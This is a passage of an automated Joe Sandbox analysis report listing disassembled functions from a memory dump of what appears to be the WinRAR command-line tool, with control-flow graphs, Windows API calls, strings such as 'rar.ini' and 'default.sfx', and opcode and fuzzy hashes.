                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: H9
                                                              • API String ID: 0-2207570329
                                                              • Opcode ID: 479a09c780d4be94e5648284cf9069ca7028a91d6761c81901c4d854d78fe811
                                                              • Instruction ID: db68cf0092f5f993d8541a33a934194d491f230e24f3cb7ca196ea82e394cb5a
                                                              • Opcode Fuzzy Hash: 479a09c780d4be94e5648284cf9069ca7028a91d6761c81901c4d854d78fe811
                                                              • Instruction Fuzzy Hash: DCE1CD62A08B9685EF10DF25E848AFD33A9EB8678CF464035CE4D83785DF39E554E702
                                                              Function 00007FF629B12574 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1858 7ff629b12574-7ff629b1259c 1859 7ff629b1259e-7ff629b125a0 1858->1859 1860 7ff629b125a5-7ff629b125a9 1858->1860 1861 7ff629b1273a-7ff629b12756 1859->1861 1862 7ff629b125ba-7ff629b125c6 1860->1862 1863 7ff629b125ab-7ff629b125b6 GetStdHandle 1860->1863 1864 7ff629b125c8-7ff629b125cd 1862->1864 1865 7ff629b12619-7ff629b12637 WriteFile 1862->1865 1863->1862 1867 7ff629b125cf-7ff629b12609 WriteFile 1864->1867 1868 7ff629b12644-7ff629b12648 1864->1868 1866 7ff629b1263b-7ff629b1263e 1865->1866 1866->1868 1869 7ff629b12733-7ff629b12737 1866->1869 1867->1868 1871 7ff629b1260b-7ff629b12615 1867->1871 1868->1869 1870 7ff629b1264e-7ff629b12652 1868->1870 1869->1861 1870->1869 1872 7ff629b12658-7ff629b12692 GetLastError call 7ff629b13144 SetLastError 1870->1872 1871->1867 1873 7ff629b12617 1871->1873 1878 7ff629b126bc-7ff629b126d0 call 7ff629b0c95c 1872->1878 1879 7ff629b12694-7ff629b126a2 1872->1879 1873->1866 1884 7ff629b12721-7ff629b1272e call 7ff629b0cf14 1878->1884 1885 7ff629b126d2-7ff629b126db 1878->1885 1879->1878 1880 7ff629b126a4-7ff629b126ab 1879->1880 1880->1878 1883 7ff629b126ad-7ff629b126b7 call 7ff629b0cf34 1880->1883 1883->1878 1884->1869 1885->1862 1887 7ff629b126e1-7ff629b126e3 1885->1887 1887->1862 1889 7ff629b126e9-7ff629b1271c 1887->1889 1889->1862
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastWrite$Handle
                                                              • String ID:
                                                              • API String ID: 3350704910-0
                                                              • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                              • Instruction ID: 8be5f2f13f5ed4632f998a332eb22bf9303573ec44935bac522aece2ce0adbfe
                                                              • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                              • Instruction Fuzzy Hash: 2E515326B0864687EE64DF26E85437F6360FBCBB86F440135DA4E87A90CF3CE545DA02
                                                              Function 00007FF629B11E80 Relevance: 7.6, APIs: 5, Instructions: 127filetimeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1894 7ff629b11e80-7ff629b11ebb call 7ff629b4a5a0 1897 7ff629b11ec8 1894->1897 1898 7ff629b11ebd-7ff629b11ec1 1894->1898 1900 7ff629b11ecb-7ff629b11f57 CreateFileW 1897->1900 1898->1897 1899 7ff629b11ec3-7ff629b11ec6 1898->1899 1899->1900 1901 7ff629b11f59-7ff629b11f76 GetLastError call 7ff629b24534 1900->1901 1902 7ff629b11fcd-7ff629b11fd1 1900->1902 1910 7ff629b11f78-7ff629b11fb6 CreateFileW GetLastError 1901->1910 1911 7ff629b11fba 1901->1911 1904 7ff629b11ff7-7ff629b1200f 1902->1904 1905 7ff629b11fd3-7ff629b11fd7 1902->1905 1908 7ff629b12027-7ff629b1204b call 7ff629b4a610 1904->1908 1909 7ff629b12011-7ff629b12022 call 7ff629b3a9e8 1904->1909 1905->1904 1907 7ff629b11fd9-7ff629b11ff1 SetFileTime 1905->1907 1907->1904 1909->1908 1910->1902 1914 7ff629b11fb8 1910->1914 1915 7ff629b11fbf-7ff629b11fc1 1911->1915 1914->1915 1915->1902 1917 7ff629b11fc3 1915->1917 1917->1902
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: File$CreateErrorLast$Time
                                                              • String ID:
                                                              • API String ID: 1999340476-0
                                                              • Opcode ID: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                              • Instruction ID: b3a3e73ceca4aafdf5562462dea549688ddc84b643d04d0871b6ebf573549a2b
                                                              • Opcode Fuzzy Hash: 892e3554a84f7d5f3af4d66201b4842f90aabb2a874f58c4d931fe245cb08f10
                                                              • Instruction Fuzzy Hash: 66411272A1868946FF608F25A8047AE6B90A787BB9F000338DE79866C4DF7CD4459B01
                                                              Function 00007FF629B06AD0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 113COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: swprintf
                                                              • String ID: rar.ini$switches=$switches_%ls=
                                                              • API String ID: 233258989-2235180025
                                                              • Opcode ID: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                              • Instruction ID: 983430fdd9190cfc4e4024a64143ae32adc431a542eba9cc93e345827380f589
                                                              • Opcode Fuzzy Hash: 7d70d85aa57c4b2adeedb5d1110c6c2e0691d0eb838de4c05f034f10faa9e0d3
                                                              • Instruction Fuzzy Hash: 93419C22A1869A82EF10EF31D9511FE33A0EB867A5F400635EA5D87AD5EF3CE541E301
                                                              Function 00007FF629B27E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 102COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcsetbuf$ErrorLibraryLoadModeVersion
                                                              • String ID: rar.lng
                                                              • API String ID: 553376247-2410228151
                                                              • Opcode ID: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                              • Instruction ID: d4ba7444327b855b6b2a430bda9e154c88c698ae8781e0f8830a8d3bc8c3ce5b
                                                              • Opcode Fuzzy Hash: da8370b5298aa504e96f4bedb37cf3b824543d1dd7ee1d37a7dea72557966179
                                                              • Instruction Fuzzy Hash: AF41AF21E0C28B42EF14AF219D512BF6391AFC7796F580138E90D8BAD7DE2DF405A716
                                                              Function 00007FF629B240A4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • SHGetMalloc.SHELL32(?,00000800,?,00007FF629B24432,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B240C4
                                                              • SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B240DF
                                                              • SHGetPathFromIDListW.SHELL32 ref: 00007FF629B240F1
                                                                • Part of subcall function 00007FF629B13458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF629B2413F,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B134A0
                                                                • Part of subcall function 00007FF629B13458: CreateDirectoryW.KERNEL32(00000800,00000000,?,00007FF629B2413F,?,?,?,?,00000800,00000000,00000000,00007FF629B238CB,?,?,?,00007FF629B241EC), ref: 00007FF629B134D5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
                                                              • String ID: WinRAR
                                                              • API String ID: 977838571-3970807970
                                                              • Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                              • Instruction ID: 4a2476f3edbd5e4da011ea4a7f6e1195c92201e44a33cfef10fc6e168544f6da
                                                              • Opcode Fuzzy Hash: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
                                                              • Instruction Fuzzy Hash: 89215B26A0CA4680EE509F23AC501BF6761EFDABD2B095035DF0E87B59DE3CE444D601
                                                              Function 00007FF629B5978C Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF629B53CEF,?,?,00000000,00007FF629B53CAA,?,?,00000000,00007FF629B53FD9), ref: 00007FF629B597A5
                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF629B53CEF,?,?,00000000,00007FF629B53CAA,?,?,00000000,00007FF629B53FD9), ref: 00007FF629B59807
                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF629B53CEF,?,?,00000000,00007FF629B53CAA,?,?,00000000,00007FF629B53FD9), ref: 00007FF629B59841
                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF629B53CEF,?,?,00000000,00007FF629B53CAA,?,?,00000000,00007FF629B53FD9), ref: 00007FF629B5986B
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                              • String ID:
                                                              • API String ID: 1557788787-0
                                                              • Opcode ID: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                              • Instruction ID: 68557fd4fae87edc4e3e302ff94d807cfeed876871e5c2dcc6c9ddee8daf2d22
                                                              • Opcode Fuzzy Hash: 364642b671081880708a9fd88c74d382691b826692dc9b7a9f4ea86390b8b8db
                                                              • Instruction Fuzzy Hash: C3218421E0875981EE208F13E84012F66A4FF99FD1F484135DE9EA3BA4DF7CE4529305
                                                              Function 00007FF629B11C74 Relevance: 6.1, APIs: 4, Instructions: 55fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FileHandleRead
                                                              • String ID:
                                                              • API String ID: 2244327787-0
                                                              • Opcode ID: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                              • Instruction ID: 2f30579027004dde9903166ca25398b4b3f21c2c14d40635bd93b1402b6622ad
                                                              • Opcode Fuzzy Hash: 292f130439141af7737bd2c92edf84b453f5fe027529f60c064a2129a7dd684d
                                                              • Instruction Fuzzy Hash: 77216021E0854E81EE608F26E84037F66A4BFC7B96F104535EA59CB6D4CE2DE851E743
                                                              Function 00007FF629B049F8 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AFUM$default.sfx
                                                              • API String ID: 0-2491287583
                                                              • Opcode ID: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                              • Instruction ID: 9e9f941292c11942c7cf8c80a2863a9078216c847960b527f420f4da08718e95
                                                              • Opcode Fuzzy Hash: 9c5250dc79f526f8b88a1db49316f6b7f6f5dd8f7a69fa39e4eeb80febe8b362
                                                              • Instruction Fuzzy Hash: E681C921E0C68A40EF709F119A442BF3292AFD3786F448031DE8D876C5EF7DA495E752
                                                              Function 00007FF629B565BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: FileHandleType
                                                              • String ID: @
                                                              • API String ID: 3000768030-2766056989
                                                              • Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                              • Instruction ID: 912258168f83d58645b9493bcd83069eadf69e0cab35585eeaf88cc171662406
                                                              • Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
                                                              • Instruction Fuzzy Hash: A6218422A1874A81EF748F35DC9017E2655EBD6775F281335DA6E867D4CE38E881E302
                                                              Function 00007FF629B3B9BC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897135394.00007FF629B98000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1897165717.00007FF629B9E000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_65_2_7ff629af0000_rar.jbxd
                                                              Similarity
                                                              • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                              • String ID: CreateThread failed
                                                              • API String ID: 1217111108-3849766595
                                                              • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                              • Instruction ID: 8dfa1df89be3d21a781067bca438e8cae5dc86f4a335ef8f96daacaac391a58d
                                                              • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                              • Instruction Fuzzy Hash: FB116031918A4A82EF04EF21EC401BF7360FBC6786F544136D68D82669DF3CE546D745
                                                              Function 00007FF629B3BB80 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000041.00000002.1896814461.00007FF629AF1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FF629AF0000, based on PE: true
                                                              • Associated: 00000041.00000002.1896778651.00007FF629AF0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896878697.00007FF629B60000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896919426.00007FF629B78000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896954871.00007FF629B79000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B7A000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B84000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B8E000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                              • Associated: 00000041.00000002.1896984586.00007FF629B96000.00000004.00000001.01000000.0000001A.sdmpDownload File
